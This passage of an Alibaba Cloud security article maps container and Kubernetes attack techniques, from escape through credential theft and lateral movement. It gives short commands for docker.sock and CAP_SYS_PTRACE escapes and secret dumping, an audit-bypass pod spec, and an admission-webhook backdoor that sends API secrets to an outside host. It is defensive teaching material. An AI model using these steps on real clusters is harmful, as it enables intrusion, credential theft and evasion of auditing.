Docker软件历史上出现过多个高危安全漏洞,目前仍有一定影响的是两个2019年的漏洞:Docker runc RCE(CVE-2019-5736)和Docker cp RCE(CVE-2019-14271)。两个漏洞均利用了Docker本身的功能设计缺陷,利用覆盖容器内部runc文件、libnss库,从而实现从容器到宿主机的逃逸行为。从攻击者角度来看,这两个漏洞均需要与宿主机交互才会触发payload执行,实战中并不高效,但Docker既要隔离又要通信的机制设计或许会在未来暴露出更多问题。在云服务商提供的托管K8s集群以及Serverless服务中,Docker服务自身安全性会由云服务商维护,相比自建,安全性会更有保障。
4.6 利用K8s漏洞进行提权
容器化基础设施每一环的软件漏洞都会带来安全风险。Kubernetes特权升级漏洞(CVE-2018-1002105)允许普通用户在一定前提下提升至K8s API Server的最高权限。该漏洞需要用户拥有对某个namespace下pod的操作权限,同时需要client到API Server和kubelet的网络通路来实施攻击。同样,该漏洞在云服务中已经被服务商修复,在自建的K8s集群中仍有发挥空间。
4.7 容器内访问docker.sock逃逸
当docker.sock被挂载到容器内部时,攻击者可以在容器内部访问该socket,管理docker daemon。
docker -v /var/run/docker.sock:/var/run/docker.sock
此时容器内部可以与docker deamon通信,并另起一个高权限的恶意容器,从而拿到root shell。
示例:与docker deamon通信:
find / -name docker.sock
curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json
4.8 利用Linux Capabilities逃逸
容器即隔离,容器在设计上使用cgroup、namespace等对宿主机的资源进行隔离及调度使用,同时也支持使用Linux capabilities做细粒度的权限管控。从这一角度来看,不安全的权限分配会为容器逃逸提供通路。
示例:K8s YAML配置中对capabilities的支持:
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
docker会以白名单方式赋予容器运行所需的capabilities权限,我们可以在docker run命令中使用 --cap-add 以及 --cap-drop 参数控制capabilities。以下命令对容器开放了宿主机的进程空间,同时赋予容器CAP_SYS_PTRACE权限,此时攻击者在容器内部可以注入宿主机进程从而实现逃逸。
docker run -it --pid=host --cap-add=CAP_SYS_PTRACE ubuntu
5. Defense Evasion/防御逃逸
5.1 容器及宿主机日志清理
攻击者在获得一定权限之后,可以擦除容器内部及宿主机的系统日志以及服务日志,为企业的入侵事件复盘以及溯源增加难度。目前容器运行时安全解决方案中均采用实时的日志采集、自保护方案以及日志采集异常的预警,来解决日志恶意擦除导致的溯源问题。同时,在云原生的容器攻防战场中,恶意卸载安全产品agent以切断日志采集能力也逐渐成为了常见的攻击方式。
5.2 K8s Audit日志清理
Kubernetes Audit功能提供了与安全相关的按时间顺序排列的记录集,记录单个用户、管理员或系统其他组件影响系统的活动顺序。日志提供了包括事件、时间、用户、作用对象、发起者、执行结果等详细信息,为运行时安全审计提供便利。攻击者可以通过清理本地日志文件(用户/服务商可自定义位置)以及切断服务商/安全产品的日志上传通道(卸载agent或者阻断网络通路)来隐藏对K8s集群的操作,一些容器安全产品通过K8s AuditSink功能将日志导出到外部审计,也可通过修改K8s配置进行开启或关闭。
示例:阿里云容器服务Kubernetes Audit审计中心:
6审计中心.png
5.3 利用系统Pod伪装
K8s在部署时会在kube-system namespace中内置一些常见的功能性pod。在云厂商提供的容器服务中,集群还会默认携带一些云服务的组件(如日志采集、性能监控的agent)。攻击者可以利用常见的K8s内置pod作为后门容器,或将后门代码植入这些pod来实现隐蔽的持久化。
示例:阿里云托管版K8s服务内置pod:
xy@x-8 ~/D/test> kubectl get deployments --namespace=kube-system
NAME READY UP-TO-DATE AVAILABLE AGE
alibaba-log-controller 1/1 1 1 183d
alicloud-application-controller 1/1 1 1 183d
alicloud-disk-controller 1/1 1 1 183d
alicloud-monitor-controller 1/1 1 1 183d
aliyun-acr-credential-helper 1/1 1 1 183d
coredns 2/2 2 2 183d
metrics-server 1/1 1 1 183d
nginx-ingress-controller 2/2 2 2 183d
tiller-deploy 1/1 1 1 183d
5.4 通过代理或匿名网络访问K8s API Server
利用代理或匿名网络执行攻击是常见的反溯源行为,在K8s Audit日志中记录了每个行为发起者的源IP,通过公网访问API Server的IP将会被记录并触发异常检测和威胁情报的预警。
示例:K8s Audit日志对pod exec行为的记录:
7行为的记录.png
5.5 清理安全产品Agent
目前主流容器运行时的安全产品部署方式有两种:平行容器模式和主机agent模式。前者创建安全容器采集pod、K8s集群日志以及实现网络代理;后者在VM层对容器层的进程网络文件进行采集。攻击者在获取到集群管理权限或逃逸到宿主机时,可以通过清理掉安全产品植入的探针,破坏日志完整性,使后续攻击行为无法被审计工具发现。在这一过程中,安全容器或主机agent异常离线往往会触发保护性告警。
5.6 创建影子API Server
攻击者可以复制原生API Server的配置,修改关键参数(例如关闭认证,允许匿名访问,使用HTTP请求),再使用这些修改过的参数创建Pods。攻击者可以通过这个影子API Server直接获取etcd内存储的内容,使后续渗透行为在审计日志中匿名。
5.7 创建超长annotations使K8s Audit日志解析失败
一般情况下云厂商/安全产品会使用自身日志服务的agent对K8s Audit日志进行采集和解析,以便于与后续审计规则结合。在入侵检测中,日志的采集-存储-计算的过程会受限于agent的性能占用、Server端日志服务以及其他云产品/开源组件对存储和计算的限制,过长的字段将有可能触发截断,导致敏感信息无法经过审计规则从而绕过入侵检测,K8s API请求中允许携带1.5MiB的数据,但在Google StackDriver日志服务仅允许解析256KB的内容,这将导致Audit日志中的敏感信息(如创建Pod时的磁盘挂载配置项)绕过审计。
示例:通过无意义的超长annotations攻击日志分析链路:
apiVersion: v1
kind: Pod
metadata:
name: annotations-bypass
annotations:
useless-key: useless-value(1 MiB)
...
6. Credential Access/窃取凭证
6.1 K8s Secret泄露
K8s使用Secret对象对access key、密码、OAuth token和ssh key等敏感信息进行统一管理。pod定义时可以引用secret对象以便在运行时访问。攻击者可以通过pod内部service account或更高权限用户来获取这些secret内容,从中窃取其他服务的通信凭证。
示例:查看并下载K8s secret保存的凭据:
xy@x-8 ~> kubectl get secrets --namespace=kube-system
NAME TYPE DATA AGE
admin-token-ltbcr kubernetes.io/service-account-token 3 184d
alibaba-log-controller-token-9kv4m kubernetes.io/service-account-token 3 184d
aliyun-acr-credential-helper-token-vwmlw kubernetes.io/service-account-token 3 184d
attachdetach-controller-token-l5bfh kubernetes.io/service-account-token 3 184d
bootstrap-signer-token-qbrx7 kubernetes.io/service-account-token 3 184d
bootstrap-token-509e2b bootstrap.kubernetes.io/token 6 184d
certificate-controller-token-dgpjn kubernetes.io/service-account-token 3 184d
cloud-node-controller-token-647sw kubernetes.io/service-account-token 3 184d
...
xy@x-8 ~> kubectl get secret alibaba-log-controller-token-9kv4m --namespace=kube-system -o yaml
6.2 云产品AK泄露
云原生的应用部署流程中会涉及到各种云产品的API通信,当某应用被攻破后,攻击者可以通过K8s secret或者挂载到本地的凭证文件来获取相关服务的AK并进行横向移动。一种常见的场景是:入侵WEB应用后获取云存储(OSS)、云数据库(RDS)、日志服务的通信凭证,并进一步窃取数据。
示例:关于云产品AK的扫描规则已被工具化:
8工具化.png
6.3 K8s Service Account凭证泄露
此类场景多见于办公网运维PC、跳板机以及通过SSH管理的master节点上。黑客在攻破此类服务器时,可以检查本地是否存在kubectl鉴权所需的配置文件(一般在$HOME/.kube/config),该文件通常包含了登录K8s集群的全部信息。
6.4 应用层API凭证泄露
在复杂业务场景以及微服务架构中,K8s各个服务之间、容器与VM之间会通过API方式进行通信,窃取其通信凭证可用于横向渗透。
6.5 利用K8s准入控制器窃取信息
K8s准入控制器(Admission Controller)用于hook客户端对API Server的请求。其中变更(mutating)控制器可以修改被其接受的对象;验证(validating)控制器可以审计并判断是否允许该请求通过。准入控制器是可以串联的,在请求到达API Server之前,如有任何一个控制器拒绝了该请求,则整个请求将立即被拒绝,并向终端用户返回一个错误。
为了便于用户部署自己的准入服务,K8s提供了动态准入控制(Admission Webhook)功能,即用于接收准入请求并对其进行处理的HTTP回调机制。
一种利用动态准入控制实现持久化的方式:攻击者在获取cluster-admin权限后,可以创建恶意的准入控制器hook掉所有的API访问,引用攻击者的外部webhook作为validating服务,这样k8s就会将携带敏感信息的API请求发送到攻击者所用服务器。
示例:利用准入控制器后门,使用通配符hook全部操作,使用failurePolicy和timeoutSeconds参数做到用户侧无感,从而实现隐蔽的数据窃取(如:K8s secret创建时发送到API的AK信息)。
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
...
webhooks:
- name: my-webhook.example.com
failurePolicy: Ignore
timeoutSeconds: 2
rules:
- apiGroups: ["*"]
apiVersions: ["*"]
operations: ["*"]
resources: ["*/*"]
scope: "*"
...
7. Discovery/探测
7.1 访问K8s API Server
(参考2.4利用Service Account连接API Server执行指令)攻击者进入pod之后,可以通过curl或wget等http客户端,或使用编译好的报文构造工具,直接访问K8s REST API,当service account具有高权限时可以直接下发命令进行横向移动。而当用户具有低权限时,也可能通过API Server探测到集群内部的资源信息、运行状态以及secret,有利于寻找下一个突破点。
7.2 访问Kubelet API
在kubernetes集群中,每个Node节点都会启动Kubelet进程,用来处理Master节点下发到本节点的任务,管理Pod和其中的容器。包括10250端口的认证API、10255端口的只读API以及10256端口的健康检查API。
其中10255端口可以无需授权进行只读访问,攻击者可以访问/pods获取到node、pod地址以及pod的挂载情况、环境变量等敏感信息,辅助还原业务场景和集群网络拓扑,以寻找后续攻击点。
关于Kubelet API官方并未提供文档,更多接口可在Kubelet源码中挖掘。一些有用的路径:
http://{node_ip}:10255/pods
http://{node_ip}:10255/spec
10250的端口当前版本中默认需要认证,但在老版本的K8s集群中或在用户权限(system:anonymous)被错误配置的情况下,可以尝试直接通过10250端口下发指令。
示例:命令下发:
root@myappnew:/# curl --insecure https://192.168.0.237:10250/pods
Unauthorized
9CIDR.png
7.3 Cluster内网扫描
黑客通常会对Node、Pod、Service三个网段进行主机存活探测和端口扫描,然后从K8s内置服务、用户应用、第三方K8s插件等角度寻找更多攻击面,同时会通过找到Node IP并访问Kubelet API获取pod的详细拓扑信息。
阿里云容器服务默认CIDR:
7.4 访问K8s Dashboard所在的Pod
Kubernetes Dashboard为用户提供WEB界面,便于创建、修改和管理Kubernetes资源(如 Deployment,Job,DaemonSet等)。Dashboard的部署取决于云厂商和用户自身的配置,在官方的部署流程中,dashboard会创建独立的Namespace、Service、Role以及ServiceAccount。
示例:阿里云容器服务提供的dashboard:
10dashboard.png
由于K8s pod之间默认允许通信,攻击者在进入某个pod之后,可以通过信息收集或内网扫描的方式发现K8s dashboard所在service地址,并通过kubernetes-dashboard service account进行认证操作。
7.5 访问私有镜像库
参考1.8和3.4关于私有镜像库的攻击面,攻击者可以在K8s secret或本地配置文件中找到私有镜像库的连接方式,并在权限允许的情况下劫持私有镜像库中的镜像,实现横向移动和持久化。
7.6 访问云厂商服务接口
(参考6.2云产品AK泄漏)在云原生的容器化应用中,服务往往会与多种内外部API进行交互,攻击者可以通过收集这些API的登录凭据或测试是否存在未授权访问来进行攻击准备。
此外,在某些云服务商提供的CaaS或Serverless容器中,为便于使用者与底层云基础设施进行通信,厂商通过植入专用pod或者将API挂载到业务pod的方式提供额外的接口,这些接口也会成为攻击者收集信息过程中的突破口。
7.7 通过NodePort访问Service
K8s service的暴露方式由三种:ClusterIP,NodePort和LoadBalancer。其中LoadBalancer多与云厂商的负载均衡类产品集成,具有较强的流量审计能力。
一些业务场景中存在着K8s与VM并存的内网环境,当攻击者通过非容器化的弱点进入内网时,可以借助NodePort进行横向移动。在频繁迭代的业务中,使用NodePort的服务相比ClusterIP更加固定,可用做控制通道来穿透网络边界管控以及防火墙的限制。
默认情况下,K8s集群NodePort分配的端口范围为:30000-32767。
8. Lateral Movement/横向移动
8.1 窃取凭证攻击云服务
(参考6.2云产品AK泄漏)攻击者利用容器内部文件或K8s secret中窃取到的云服务通信凭证进行横向移动。
8.2 窃取凭证攻击其他应用
参考第6节的各项内容。在基础设施高度容器化的场景中,绝大部分服务都是API化的,这使凭证窃取成为扩展攻击面、获取目标数据的重要手段。K8s集群、云产品以及自建应用的通信凭证都是攻击者窃取的目标。
8.3 通过Service Account访问K8s API
(参考2.4利用Service Account连接API Server执行指令)攻击者在容器内部可通过Service Account访问K8s API刺探当前pod用户权限,并在权限允许的前提下对API下发指令或利用K8s提权漏洞访问集群中的其他资源。
8.4 Cluster内网渗透
一般情况下,K8s会默认允许Cluster内部的pod与service之间直接通信,这构成了一个"大内网"环境。攻击者在突破一个pod之后,可以通过内网扫描收集服务信息并通过应用漏洞、弱口令以及未授权访问等方式渗透Cluster的其他资源。K8s支持通过自带的网络策略(NetworkPolicy)来定义pod的通信规则,一些网络侧插件、容器安全产品也支持东西向的通信审计与管控。
8.5 通过挂载目录逃逸到宿主机
(参考3.2通过挂载目录向宿主机写入文件)攻击者可以利用挂载到容器内部的目录完成从pod到node的移动。
8.6 访问K8s Dashboard
(参考7.4访问K8s Dashboard所在的Pod)攻击者在进入某个pod之后,可以通过信息收集或内网扫描的方式发现K8s dashboard所在service地址,并在管理员权限配置失当的情况下通过K8s Dashboard下发指令。
8.7 攻击第三方K8s插件
为了快速上手,很多K8s快速入门指南都会介绍一些好用的插件和配置方案,但教程的创建者很少考虑到真实生产业务中的安全问题,而这些插件往往在初始的几个版本中存在鉴权方面的漏洞(如API默认允许未授权访问),直到被攻击者反复测试之后才会逐渐稳定可靠。这些不安全的配置以及使用的第三方K8s插件/工具会引入新的攻击面,并为横向移动提供便利。
示例:常见的利用第三方组件进行横向移动的过程:
攻击者进入pod后,通过未授权访问或漏洞攻击第三方组件,并利用这些组件的权限操纵K8s集群。
11K8s集群.png
9. Impact/影响
9.1 破坏系统及数据
以破坏为目的的攻击者可能会停止或禁用系统上的服务、删除某些核心文件及数据以使合法用户无法使用这些服务。停止关键服务可能会抑制防御方对事件的响应,并有利于攻击者的最终目标。
9.2 劫持资源
常见于攻击者通过自动化脚本入侵并植入挖矿程序进行获利。
9.3 DoS
攻击者会发起DoS攻击,影响系统的可用性。容器化场景中的DoS攻击包括对业务层、K8s API层的攻击以及对Pod资源的抢占。
9.4 加密勒索
在传统主机安全场景中,有经验的攻击者会找到企业核心数据并对其进行加密勒索。由于容器场景的资源弹性较大,且后端数据的产生、存储、销毁链路往往通过云服务API实现,而非在用户磁盘上进行,企业可以通过云原生的快照与备份服务来实现资产备份,避免核心数据丢失。
三、阿里云容器安全解决方案
阿里云容器服务(ACK)提供高性能可伸缩的容器应用管理服务,支持企业级Kubernetes容器化应用的生命周期管理。阿里云容器镜像服务(ACR)是云原生时代的重要基础设施之一,支撑阿里巴巴经济体容器镜像托管,分钟级分发万节点。自2015年起,先后服务了数千家企业,托管了数 PB容器镜像数据,支撑月均镜像拉取数亿次。
为了帮助云上客户更好的做好容器安全建设,阿里云重点关注容器构建、容器部署和容器运行三大生命周期阶段,结合容器ATT&CK攻防矩阵,提供自动化的容器安全检测和响应能力;同时联合阿里云原生容器安全服务,共同面向客户推出云上容器安全一体化方案,助力企业容器化进程。
借助云安全中心,阿里云可以为客户提供自动化的安全编排与响应能力,全面提升容器安全易用性;同时为容器镜像提供漏洞扫描和修复,并支持整合在容器构建流程中,避免部署存在风险的容器;对于运行时的容器被植入 Webshell、挖矿病毒等场景,自动化将隔离恶意样本,并通过联动云防火墙,针对存在漏洞的容器,提供虚拟补丁的能力,缓解安全风险。
四、写在最后
理解容器ATT&CK攻防矩阵是构建容器安全能力的第一步,除了上述涉及的能力和措施外,阿里云安全团队建议用户在实施容器化过程中需要遵循以下几点安全规范,从不同角度缓解容器化带来的风险:
1、在应用生命周期中关注您的镜像,容器,主机,容器管理平台以及相关云服务的安全性,了解潜在风险以及如何保护整体容器环境的运行免受危害。
2、收集并妥善保管K8s集群、第三方CI组件以及云服务的API通信凭证,避免因人工误操作导致的AK泄露。
3、由于容器应用生态涉及到的中间件较多,系统管理者需要关注这些中间件的漏洞披露情况并及时做好脆弱性管理和补丁升级工作。
最后,针对上述容器ATT&CK攻防矩阵,阿里云推出容器安全运行检测清单,企业可以根据下图中所展示的内容检测自己的容器安全水位,以便及时发现问题及时修复。
12检测清单.jpg
作者:徐越(乐枕) 阿里云容器安全专家
内容致谢: 陈吴栋(自朴) 阿里云高级产品经理、魏俊欣(艾格) 阿里云高级安全专家、邱戈川(了哥) 阿里云高级技术专家、杜航(达丁) 阿里云容器解决方案架构师
相关文章
|
2月前
|
安全 数据安全/隐私保护
简单讲解一下什么是ATT&CK框架
简单讲解一下什么是ATT&CK框架
140 1
|
9月前
|
安全 Shell 数据安全/隐私保护
VulnStack-01 ATT&CK红队评估(三)
VulnStack-01 ATT&CK红队评估
136 0
VulnStack-01 ATT&CK红队评估(三)
|
9月前
|
安全 Shell 网络安全
VulnStack-01 ATT&CK红队评估(二)
VulnStack-01 ATT&CK红队评估
158 0
VulnStack-01 ATT&CK红队评估(二)
|
9月前
|
NoSQL 关系型数据库 MySQL
VulnStack-01 ATT&CK红队评估(一)
VulnStack-01 ATT&CK红队评估
96 0
VulnStack-01 ATT&CK红队评估(一)
|
11月前
|
安全 Ubuntu 关系型数据库
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
463 0
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
|
测试技术 网络安全
网络安全渗透测试的基本框架ATT&CK框架
网络安全渗透测试的基本框架ATT&CK框架
209 0
|
数据库
ATT&CK框架结构之侦察
ATT&CK框架结构侦察
117 0
ATT&CK框架结构之侦察
|
传感器 存储 数据可视化
什么是ATT&CK
什么是ATT&CK
257 0
什么是ATT&CK
|
安全 测试技术 网络安全
ATT&CK 威胁情报
ATT&CK 威胁情报
114 0
ATT&CK 威胁情报
|
安全 测试技术 Linux
ATT&CK初步了解
ATT&CK初步了解
346 0
ATT&CK初步了解
相关产品
容器镜像服务
容器服务Kubernetes版
推荐文章
更多
|
{
"url": "https://developer.aliyun.com/article/765449?groupCode=aliyunsecurity",
"source_domain": "developer.aliyun.com",
"snapshot_id": "CC-MAIN-2023-50",
"warc_metadata": {
"Content-Length": "128648",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:LSQCESQ4CNJY7PFEHWMJTCMZEQYGGUWQ",
"WARC-Concurrent-To": "<urn:uuid:6bec014f-44b0-4a19-98c2-e5a8d5932773>",
"WARC-Date": "2023-11-29T14:55:24Z",
"WARC-IP-Address": "140.205.60.46",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:QHRWCFWMS4CVFPC2SDLK7EQPI2OSFSWR",
"WARC-Record-ID": "<urn:uuid:75c667fb-60d5-4e1c-ab1a-ec96e4b6f571>",
"WARC-Target-URI": "https://developer.aliyun.com/article/765449?groupCode=aliyunsecurity",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:13a3f0fa-36c6-4df2-a005-eedc365bdc22>"
},
"warc_info": "isPartOf: CC-MAIN-2023-50\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2023\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-56\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
36,
37,
45,
89,
114,
172,
180,
181,
186,
187,
263,
264,
275,
276,
348,
349,
587,
588,
607,
608,
808,
809,
815,
816,
835,
836,
859,
860,
872,
873,
1108,
1109,
1120,
1121,
1241,
1242,
1283,
1284,
1294,
1295,
1319,
1320,
1395,
1396,
1481,
1482,
1503,
1504,
1691,
1692,
1718,
1719,
1735,
1736,
1758,
1759,
1910,
1911,
2061,
2062,
2124,
2125,
2153,
2154,
2221,
2222,
2236,
2237,
2319,
2320,
2342,
2343,
2435,
2436,
2445,
2446,
2458,
2459,
2549,
2550,
2824,
2825,
2841,
2842,
2860,
2861,
2977,
2978,
3006,
3007,
3046,
3092,
3139,
3186,
3232,
3278,
3337,
3361,
3366,
3367,
3378,
3379,
3416,
3417,
3466,
3467,
3502,
3517,
3527,
3537,
3554,
3560,
3574,
3591,
3611,
3629,
3651,
3675,
3686,
3708,
3722,
3736,
3800,
3821,
3874,
3899,
3922,
3994,
4053,
4054,
4073,
4074,
4193,
4194,
4261,
4262,
4285,
4286,
4325,
4345,
4362,
4372,
4397,
4407,
4427,
4433,
4447,
4459,
4476,
4493,
4505,
4519,
4533,
4552,
4562,
4580,
4601,
4625,
4647,
4673,
4701,
4716,
4742,
4760,
4778,
4830,
4871,
4905,
4973,
5042,
5111,
5179,
5247,
5315,
5316,
5354,
5355,
5447,
5448,
5523,
5524,
5554,
5555,
5604,
5605,
5628,
5629,
5679,
5704,
6651,
6652,
6667,
6668,
6826,
6827,
6851,
6852,
6946,
6968,
6969,
6979,
6980,
6999,
7000,
7012,
7013,
7151,
7152,
7171,
7172,
7327,
7340,
7341,
7388,
7389,
7397,
7398,
7464,
7465,
7484,
7485,
7588,
7589,
7603,
7604,
7638,
7664,
7678,
7688,
7705,
7711,
7737,
7752,
7762,
7778,
7792,
7814,
7842,
7867,
7885,
7907,
7924,
7948,
7983,
8031,
8062,
8100,
8168,
8237,
8238,
8257,
8258,
8350,
8351,
8550,
8551,
8566,
8567,
8651,
8652,
8681,
8682,
8695,
8696,
8803,
8804,
8828,
8829,
8859,
8918,
8956,
9010,
9060,
9080,
9108,
9109,
9162,
9216,
9249,
9292,
9322,
9350,
9417,
9488,
9563,
9564,
9590,
9591,
9793,
9794,
9807,
9808,
9860,
9861,
9878,
9879,
10020,
10021,
10038,
10039,
10355,
10356,
10372,
10373,
10575,
10576,
10599,
10600,
10659,
10660,
10712,
10713,
10768,
10789,
10790,
10815,
10888,
10889,
10916,
10917,
11028,
11060,
11061,
11078,
11094,
11104,
11114,
11123,
11142,
11143,
11311,
11312,
11370,
11371,
11395,
11396,
11411,
11412,
11580,
11581,
11599,
11600,
11848,
11849,
11881,
11882,
11892,
11893,
11907,
11908,
12050,
12071,
12072,
12137,
12208,
12280,
12352,
12424,
12496,
12568,
12640,
12712,
12784,
12856,
12857,
12887,
12888,
12980,
12981,
13011,
13012,
13023,
13024,
13040,
13041,
13231,
13232,
13251,
13252,
13377,
13378,
13414,
13415,
13684,
13685,
13717,
13718,
13733,
13743,
13753,
13780,
13795,
13833,
13837,
13838,
13864,
13865,
13882,
13883,
14032,
14057,
14058,
14112,
14210,
14309,
14408,
14507,
14606,
14705,
14804,
14903,
15002,
15006,
15102,
15103,
15115,
15116,
15257,
15258,
15280,
15281,
15290,
15291,
15319,
15320,
15442,
15443,
15458,
15459,
15521,
15522,
15541,
15542,
15731,
15732,
15809,
15810,
15941,
15942,
16050,
16051,
16095,
16132,
16136,
16146,
16177,
16201,
16221,
16230,
16253,
16276,
16299,
16324,
16345,
16349,
16350,
16366,
16367,
16388,
16389,
16595,
16596,
16614,
16615,
16734,
16735,
16829,
16830,
16880,
16881,
16909,
16937,
16938,
17025,
17026,
17035,
17036,
17103,
17116,
17117,
17127,
17128,
17144,
17145,
17262,
17263,
17278,
17279,
17305,
17306,
17481,
17482,
17506,
17507,
17523,
17524,
17646,
17647,
17659,
17660,
17752,
17753,
17767,
17768,
17853,
17854,
17965,
17966,
17990,
17991,
18086,
18213,
18254,
18255,
18280,
18281,
18295,
18296,
18352,
18353,
18368,
18369,
18467,
18468,
18499,
18500,
18627,
18628,
18644,
18645,
18836,
18837,
18854,
18855,
18909,
18910,
18930,
18931,
19052,
19053,
19068,
19069,
19236,
19237,
19261,
19308,
19309,
19321,
19322,
19335,
19336,
19348,
19349,
19435,
19436,
19445,
19446,
19474,
19475,
19483,
19484,
19548,
19549,
19558,
19559,
19685,
19686,
19700,
19701,
19860,
19861,
19991,
19992,
20157,
20158,
20165,
20166,
20258,
20326,
20379,
20439,
20440,
20517,
20518,
20529,
20530,
20550,
20630,
20631,
20636,
20638,
20642,
20644,
20657,
20675,
20693,
20699,
20701,
20705,
20707,
20726,
20753,
20777,
20783,
20810,
20812,
20816,
20818,
20832,
20859,
20883,
20889,
20916,
20918,
20922,
20924,
20943,
20970,
20994,
20999,
21026,
21028,
21033,
21035,
21052,
21088,
21124,
21130,
21166,
21168,
21178,
21200,
21222,
21228,
21230,
21234,
21248,
21261,
21267,
21281,
21283,
21296,
21306,
21316,
21322,
21332,
21334,
21347,
21359,
21371,
21377,
21389,
21391,
21405,
21416,
21427,
21433,
21444,
21449,
21456,
21472,
21477
],
"line_end_idx": [
36,
37,
45,
89,
114,
172,
180,
181,
186,
187,
263,
264,
275,
276,
348,
349,
587,
588,
607,
608,
808,
809,
815,
816,
835,
836,
859,
860,
872,
873,
1108,
1109,
1120,
1121,
1241,
1242,
1283,
1284,
1294,
1295,
1319,
1320,
1395,
1396,
1481,
1482,
1503,
1504,
1691,
1692,
1718,
1719,
1735,
1736,
1758,
1759,
1910,
1911,
2061,
2062,
2124,
2125,
2153,
2154,
2221,
2222,
2236,
2237,
2319,
2320,
2342,
2343,
2435,
2436,
2445,
2446,
2458,
2459,
2549,
2550,
2824,
2825,
2841,
2842,
2860,
2861,
2977,
2978,
3006,
3007,
3046,
3092,
3139,
3186,
3232,
3278,
3337,
3361,
3366,
3367,
3378,
3379,
3416,
3417,
3466,
3467,
3502,
3517,
3527,
3537,
3554,
3560,
3574,
3591,
3611,
3629,
3651,
3675,
3686,
3708,
3722,
3736,
3800,
3821,
3874,
3899,
3922,
3994,
4053,
4054,
4073,
4074,
4193,
4194,
4261,
4262,
4285,
4286,
4325,
4345,
4362,
4372,
4397,
4407,
4427,
4433,
4447,
4459,
4476,
4493,
4505,
4519,
4533,
4552,
4562,
4580,
4601,
4625,
4647,
4673,
4701,
4716,
4742,
4760,
4778,
4830,
4871,
4905,
4973,
5042,
5111,
5179,
5247,
5315,
5316,
5354,
5355,
5447,
5448,
5523,
5524,
5554,
5555,
5604,
5605,
5628,
5629,
5679,
5704,
6651,
6652,
6667,
6668,
6826,
6827,
6851,
6852,
6946,
6968,
6969,
6979,
6980,
6999,
7000,
7012,
7013,
7151,
7152,
7171,
7172,
7327,
7340,
7341,
7388,
7389,
7397,
7398,
7464,
7465,
7484,
7485,
7588,
7589,
7603,
7604,
7638,
7664,
7678,
7688,
7705,
7711,
7737,
7752,
7762,
7778,
7792,
7814,
7842,
7867,
7885,
7907,
7924,
7948,
7983,
8031,
8062,
8100,
8168,
8237,
8238,
8257,
8258,
8350,
8351,
8550,
8551,
8566,
8567,
8651,
8652,
8681,
8682,
8695,
8696,
8803,
8804,
8828,
8829,
8859,
8918,
8956,
9010,
9060,
9080,
9108,
9109,
9162,
9216,
9249,
9292,
9322,
9350,
9417,
9488,
9563,
9564,
9590,
9591,
9793,
9794,
9807,
9808,
9860,
9861,
9878,
9879,
10020,
10021,
10038,
10039,
10355,
10356,
10372,
10373,
10575,
10576,
10599,
10600,
10659,
10660,
10712,
10713,
10768,
10789,
10790,
10815,
10888,
10889,
10916,
10917,
11028,
11060,
11061,
11078,
11094,
11104,
11114,
11123,
11142,
11143,
11311,
11312,
11370,
11371,
11395,
11396,
11411,
11412,
11580,
11581,
11599,
11600,
11848,
11849,
11881,
11882,
11892,
11893,
11907,
11908,
12050,
12071,
12072,
12137,
12208,
12280,
12352,
12424,
12496,
12568,
12640,
12712,
12784,
12856,
12857,
12887,
12888,
12980,
12981,
13011,
13012,
13023,
13024,
13040,
13041,
13231,
13232,
13251,
13252,
13377,
13378,
13414,
13415,
13684,
13685,
13717,
13718,
13733,
13743,
13753,
13780,
13795,
13833,
13837,
13838,
13864,
13865,
13882,
13883,
14032,
14057,
14058,
14112,
14210,
14309,
14408,
14507,
14606,
14705,
14804,
14903,
15002,
15006,
15102,
15103,
15115,
15116,
15257,
15258,
15280,
15281,
15290,
15291,
15319,
15320,
15442,
15443,
15458,
15459,
15521,
15522,
15541,
15542,
15731,
15732,
15809,
15810,
15941,
15942,
16050,
16051,
16095,
16132,
16136,
16146,
16177,
16201,
16221,
16230,
16253,
16276,
16299,
16324,
16345,
16349,
16350,
16366,
16367,
16388,
16389,
16595,
16596,
16614,
16615,
16734,
16735,
16829,
16830,
16880,
16881,
16909,
16937,
16938,
17025,
17026,
17035,
17036,
17103,
17116,
17117,
17127,
17128,
17144,
17145,
17262,
17263,
17278,
17279,
17305,
17306,
17481,
17482,
17506,
17507,
17523,
17524,
17646,
17647,
17659,
17660,
17752,
17753,
17767,
17768,
17853,
17854,
17965,
17966,
17990,
17991,
18086,
18213,
18254,
18255,
18280,
18281,
18295,
18296,
18352,
18353,
18368,
18369,
18467,
18468,
18499,
18500,
18627,
18628,
18644,
18645,
18836,
18837,
18854,
18855,
18909,
18910,
18930,
18931,
19052,
19053,
19068,
19069,
19236,
19237,
19261,
19308,
19309,
19321,
19322,
19335,
19336,
19348,
19349,
19435,
19436,
19445,
19446,
19474,
19475,
19483,
19484,
19548,
19549,
19558,
19559,
19685,
19686,
19700,
19701,
19860,
19861,
19991,
19992,
20157,
20158,
20165,
20166,
20258,
20326,
20379,
20439,
20440,
20517,
20518,
20529,
20530,
20550,
20630,
20631,
20636,
20638,
20642,
20644,
20657,
20675,
20693,
20699,
20701,
20705,
20707,
20726,
20753,
20777,
20783,
20810,
20812,
20816,
20818,
20832,
20859,
20883,
20889,
20916,
20918,
20922,
20924,
20943,
20970,
20994,
20999,
21026,
21028,
21033,
21035,
21052,
21088,
21124,
21130,
21166,
21168,
21178,
21200,
21222,
21228,
21230,
21234,
21248,
21261,
21267,
21281,
21283,
21296,
21306,
21316,
21322,
21332,
21334,
21347,
21359,
21371,
21377,
21389,
21391,
21405,
21416,
21427,
21433,
21444,
21449,
21456,
21472,
21477,
21479
]
}
|
{
"red_pajama_v2": {
